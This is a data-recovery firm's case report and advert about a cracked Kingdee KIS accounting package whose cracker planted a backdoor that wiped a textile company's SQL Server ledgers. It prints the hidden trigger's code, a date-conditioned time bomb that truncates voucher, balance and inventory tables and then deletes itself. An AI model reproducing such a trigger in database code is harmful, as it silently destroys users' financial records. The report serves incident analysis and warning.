金蝶KIS專業版 替換SXS.dll 遭後門清空數據(憑證被改為:恢複數據聯繫QQ 735330197,2251434429)恢復解決方法。 【客戶名稱】:山東青島福隆發紡織品有限公司 【軟體名稱】:金蝶KIS專業版12.2 【資料庫版本】:MS SQL server 2000 【資料庫大小】:1G ...
金蝶KIS專業版 替換SXS.dll 遭後門清空數據(憑證被改為:恢複數據聯繫QQ 735330197,2251434429)恢復解決方法。
【客戶名稱】:山東青島福隆發紡織品有限公司
【軟體名稱】:金蝶KIS專業版12.2
【資料庫版本】:MS SQL server 2000 【資料庫大小】:1GB 。
【問題描述】:客戶貪圖便宜,使用破解版財務軟體,破解者破解後內藏了後門,清空所有數據的觸發器。用了1年時間後,後門觸發器被激活,刪除了所有 科目餘額表、存貨餘額、存貨往來明細賬、修改了所有 總賬憑證、業務憑證、會計科目、內容為:恢複數據聯繫QQ 735330197,2251434429,使資料庫全部癱瘓,所有賬目混亂。沒有備份,急需年度上報,急需恢復。
【問題分析】:接到電話後,客戶發來遭後門修改資料庫文件,立即組織對資料庫分析工作,發現資料庫內有一個後門觸發器 t_log_autoNumbe ,大致代碼內容為:
if (@FGLCurrYear=2014 and @FGLCurrPeriod>=1) or (@FICCurrYear=2014 and @FICCurrPeriod>=1)
begin
if (@Flogdays>=15)
begin
TRUNCATE TABLE t_voucherEntry --刪除總賬憑證
TRUNCATE TABLE t_balance --刪除科目餘額表
if @FVersion='8.0' --版本大於8.0
TRUNCATE TABLE icstockbillEntry --刪除存貨出入庫明細賬
else
TRUNCATE TABLE t_cc_stockbillEntry --刪除庫存明細賬
drop trigger t_log_AutoNumber
end
end
GO
通過大致代碼內容,得知後門刪除了哪些東西,用了什麼方法!客戶資料庫文件是MSDE 為簡單模型,沒有日誌記錄,只能在現有MDF文件基礎上,進行恢復!通過我們自主研發的提取工具,進行相關刪除數據,修改數據反後門操作,得到憑證讀寫日誌文件,科目餘額表等於表,通過編寫對應的分離程式,進行憑證拼裝,成功恢復後門修改數據95%。
【恢復結果】:發回給客戶測試驗收,反饋數據基本正確,能恢復這個程度,客戶很滿意!得到客戶的極大好評。
【溫馨提示】:使用破解版軟體,危害很大。居心不良的破解者,可能會留下後門木馬,刪除修改數據,敲詐錢財。如果商用,請使用正版軟體!
【數據工程師】尹軍 電話/微信/QQ:18302650920 歡迎來人來電咨詢洽談數據恢復。
1、系統崩潰只剩下Sqlserver數據文件的情況下的恢復.即無日誌文件或者日誌文件損壞情況下的恢復 2、SqlServer數據文件內部存在壞頁情況下的恢復。 3、在Sql Server2000、SqlServer2005、SQL2008運行在簡單日誌模式、完全日誌模式或者大容量日誌記錄模式下數據被誤(drop、delete、truncate)刪除表恢復,updata後的數據恢復等 4、Sql Serve文件無法附加情況下的數據恢復。 5、Sql Server資料庫被標記為可疑,不可用等情況. 6、Sql Server2000、SqlServer2005、SQL2008資料庫SysObjects等系統表損壞無法正常應用情況下的恢復. 7、Sql Server資料庫只有數據文件 沒有任何日誌的情況下的恢復. 8、Sql Server數據文件被誤刪除情況下的恢復. 9、Sql Server2000、Sql Server2005、SQL2008資料庫master資料庫損壞而無法正常運行情況下的恢復。 10、Sql server還原時報一致性錯誤,錯誤823等情況下的數據恢復,各種錯誤提示的資料庫文件修複 11、可恢復因硬碟壞道造成的資料庫損壞 12、可修複日誌收縮或突然斷電後的資料庫 13、可恢復多個關係型資料庫 14、可恢復SQL資料庫BKF備份文件以及BAK文件 15、磁碟陣列上的SQL SERVER資料庫被誤格式化等情況下的資料庫恢復 16、可進行SQL SERVER資料庫格式化,誤刪除,所有市面恢復軟體無法恢復情況下的恢復,即碎片級資料庫提取恢復。 17、可恢復Shade勒索病毒文件中毒被加密,資料庫文件反敲詐服務。